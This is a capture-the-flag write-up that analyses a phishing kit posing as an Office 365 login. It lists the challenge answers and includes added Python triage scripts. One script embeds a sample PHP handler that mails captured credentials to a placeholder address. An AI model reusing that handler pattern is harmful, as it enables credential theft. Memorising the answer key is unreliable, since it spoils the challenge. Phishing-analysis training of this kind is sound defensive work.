- CTF is hosted on https://blueteamlabs.online/
Scenario
You have been sent a phishing link. Sadly the threat actor doesn’t know who they were dealing with. From only one phishing link find out all you can about the person responsible and bring them to justice.
Intro
First of all, after connecting to the machine, there’s a note on the desktop that we’re supposed to read.
It tells us to visit the page it mentions, so let’s do that.
There’s no HTTPS, the CSS is poor, and favicon.ico isn’t being loaded (which is weird, since it’s supposed to be Microsoft’s O365 logon page). These should be some warning signs ;).
One question asks about the background image. We can grab its URL in the browser inspector just by finding the right image.
What is the full URL of the background image which is on the phishing landing page? (3 points): http://securedocument.net/secure/L0GIN/protected/login/portal/axCBhIt.png
Diving deeper
Checking the source code, there are other things that look weird.
Checking jeff.php, we can actually read the PHP code.
What is the name of the php page which will process the stolen credentials? (3 points):
jeff.php
What email address is setup to receive the phishing credential logs? (3 points):
boris.smets@tfl-uk.co
What is the domain of the website which should appear once credentials are entered? (3 points):
office.com
Web Page Analysis
If we browse to the directory containing index1.html, we’ll see that directory listing is enabled.
There’s apparently a leftover .zip there:
One question asks about the SHA256 hash of that .zip.
What is the SHA256 of the phishing kit in ZIP format? (Provide the last 6 characters) (3 points):
fa5b48
If we check the root page, it looks like an error.
But if we check the source, more information about the phishing page is revealed.
The HTML page used on securedocument.net is a decoy. Where was this webpage mirrored from, and what tool was used? (Use the first part of the tool name only) (4 points): 61.221.12.26/cgi-sys/defaultwebpage.cgi, HTTrack
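Both of the page-source questions above (the background image URL and the HTTrack mirror origin) can be answered from saved HTML without a browser. The script below is an added example, not part of the original write-up or of the challenge files: it pulls every CSS background image URL out of the source and resolves it against the page URL, and extracts the origin and tool name from an HTTrack "Mirrored from" banner comment. The sample HTML, the host 203.0.113.10 and the page URL phish.example are constructed placeholders, not the challenge's real values.

```python
"""Static triage of a phishing landing page's saved HTML source.

Added example (not from the original write-up). Extracts two artefacts:
  1. CSS background-image URLs, resolved to absolute URLs
  2. the origin site and tool named in an HTTrack mirror comment
"""
import re
from urllib.parse import urljoin

# Constructed sample page. The mirrored-from host and the image path are
# placeholders chosen for illustration, not indicators from the challenge.
SAMPLE_HTML = """<!DOCTYPE html>
<!-- Mirrored from 203.0.113.10/cgi-sys/defaultwebpage.cgi by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 01 Jan 2024 00:00:00 GMT -->
<html><head><title>Sign in</title>
<style>body { background-image: url('protected/login/portal/bg.png'); }</style>
</head><body><form action="jeff.php" method="post">...</form></body></html>
"""

# HTTrack writes a banner comment of the form
#   <!-- Mirrored from <origin> by HTTrack Website Copier/<ver> ..., <date> -->
MIRROR_RE = re.compile(
    r"<!--\s*Mirrored from\s+(?P<origin>\S+)\s+by\s+(?P<tool>HTTrack)[^>]*-->",
    re.IGNORECASE,
)

# background: url(...) / background-image: url(...) with optional quotes
BG_RE = re.compile(
    r"""background(?:-image)?\s*:\s*url\(\s*["']?([^"')]+)["']?\s*\)""",
    re.IGNORECASE,
)


def find_mirror_origin(html):
    """Return (origin, tool) from an HTTrack mirror comment, or None."""
    m = MIRROR_RE.search(html)
    if not m:
        return None
    return m.group("origin"), m.group("tool")


def find_background_images(html, page_url):
    """Return absolute URLs of every CSS background image in the page.

    Relative paths are resolved against page_url, which is how the browser
    would request them and therefore what the challenge asks for.
    """
    return [urljoin(page_url, u) for u in BG_RE.findall(html)]


if __name__ == "__main__":
    page = "http://phish.example/secure/login/index1.html"  # placeholder
    print("background images:", find_background_images(SAMPLE_HTML, page))
    print("mirror origin:", find_mirror_origin(SAMPLE_HTML))
```

Run it against the real saved source by replacing SAMPLE_HTML with the file contents and page with the URL you fetched; the mirror comment is only present when the decoy was cloned with HTTrack, so a None result simply means that artefact is absent.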
Source Code Analysis of the phishing page
Let’s unzip the code.
index1.html is actually a redirect from index.html.
What is the function called to produce the PHP variable which appears in the index1.html URL? (3 points):
Date().getTime()
There is an error in this phishing kit. What variable name is wrong, causing the phishing site to break? (Enter any of 4 potential answers)
The problem is in the form, which sends variables under different names than jeff.php expects, causing the PHP code to break.
Answer:
userrr
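The mismatch between the form's field names and the $_POST keys the PHP handler reads can be found mechanically, which is handy when triaging a kit with many fields. The script below is an added example, not part of the original write-up or of the phishing kit: it collects the name attributes of form controls in the HTML and the keys read from $_POST or $_REQUEST in the PHP, then reports fields the form sends that the handler never reads and keys the handler expects that the form never sends. The sample HTML and PHP are constructed for illustration; the expected key user and the other field names are placeholders, not the kit's actual code.

```python
"""Cross-check HTML form field names against the $_POST keys a PHP
handler reads. Added example, not from the original write-up or the kit.
"""
import re

# Constructed sample form: one field name is misspelled (userrr) relative
# to what the handler expects. Field and file names are placeholders.
SAMPLE_HTML = """<form action="jeff.php" method="post">
  <input type="text" name="userrr">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>"""

# Constructed sample handler; the recipient address and redirect target
# are placeholders, not values from the challenge.
SAMPLE_PHP = """<?php
$user = $_POST['user'];
$pass = $_POST["pass"];
mail('logs@example.invalid', 'Credentials', "$user:$pass");
header('Location: http://office.example/');
"""

# name="..." on input/select/textarea elements (single or double quotes)
INPUT_NAME_RE = re.compile(
    r"""<(?:input|select|textarea)\b[^>]*\bname\s*=\s*["']([^"']+)["']""",
    re.IGNORECASE,
)
# $_POST['key'] or $_REQUEST["key"]
POST_KEY_RE = re.compile(r"""\$_(?:POST|REQUEST)\s*\[\s*["']([^"']+)["']\s*\]""")


def form_fields(html):
    """Names of the fields the form will submit."""
    return set(INPUT_NAME_RE.findall(html))


def post_keys(php):
    """Request keys the PHP handler reads."""
    return set(POST_KEY_RE.findall(php))


def field_mismatches(html, php):
    """Return (sent_but_unused, expected_but_missing), each sorted.

    A non-empty second list is the condition that breaks the kit: the
    handler reads a key the form never sends, so the value is undefined.
    """
    sent, expected = form_fields(html), post_keys(php)
    return sorted(sent - expected), sorted(expected - sent)


if __name__ == "__main__":
    unused, missing = field_mismatches(SAMPLE_HTML, SAMPLE_PHP)
    print("sent by form but never read:", unused)
    print("read by handler but never sent:", missing)
```

Point it at the real index1.html and jeff.php from the unzipped kit to get all four candidate answers at once; the regexes are deliberately simple and will miss keys built dynamically, so treat an empty result as "nothing obvious" rather than "no bug".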